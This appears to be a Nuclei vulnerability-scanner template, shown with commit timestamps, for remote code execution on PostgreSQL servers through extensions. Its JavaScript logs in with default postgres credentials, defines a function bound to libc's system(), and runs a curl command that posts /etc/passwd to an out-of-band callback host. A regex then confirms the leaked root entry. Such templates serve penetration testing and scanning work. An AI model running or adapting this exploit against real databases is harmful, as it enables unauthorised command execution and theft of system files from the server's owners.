2024-03-29 06:35:44 +00:00
id : pgsql-extensions-rce
info :
2024-04-01 08:38:54 +00:00
name : PostgreSQL 8.1 Extensions - Remote Code Execution
2024-03-29 06:35:44 +00:00
author : pussycat0x
severity : high
description : |
PostgreSQL allows for extensions, which are modules providing extra functionality like functions, operators, or types. Starting from version 8.1, these extensions must be compiled with a special header for compatibility with PostgreSQL's extension mechanism.
reference :
- https://www.dionach.com/postgresql-9-x-remote-command-execution/
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#using-libcso6
- https://hacktricks.boitatech.com.br/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions
metadata :
2024-04-08 11:34:33 +00:00
shodan-query : product:"PostgreSQL"
2024-04-01 08:19:09 +00:00
verified : true
2024-03-29 06:35:44 +00:00
tags : postgresql,js,network,rce
2024-04-08 11:34:33 +00:00
2024-03-29 06:35:44 +00:00
javascript :
- code : |
const postgres = require('nuclei/postgres');
const client = new postgres.PGClient;
const collab = shurl
const qry = ["CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;", "SELECT system('curl -X POST -d @/etc/passwd "+ collab +"');"];
for (const x of qry){
connected = client.ExecuteQuery(Host, Port, User, Pass, Db, x);
Export(connected);
}
args :
Host : "{{Host}}"
Port : 5432
User : "{{usernames}}"
Pass : "{{password}}"
Db : "{{database}}"
shurl : http://{{interactsh-url}}
payloads :
usernames :
- postgres
database :
- postgres
password :
- postgres
attack : clusterbomb
matchers :
- type : regex
part : interactsh_request
regex :
2024-04-01 08:38:54 +00:00
- "root:[x*]:0:0:"
2024-04-05 15:42:09 +00:00
# digest: 490a0046304402204a7b50e1186d11ccd0034676de87f92710cedbc8085ffd69428d81b0410caf0d02201d1ad1956fe3f2753b210299a22f45f16b5fc9ddbc6c64958c21367ef95af431:922c64590222798bb761d5b6d8e72950
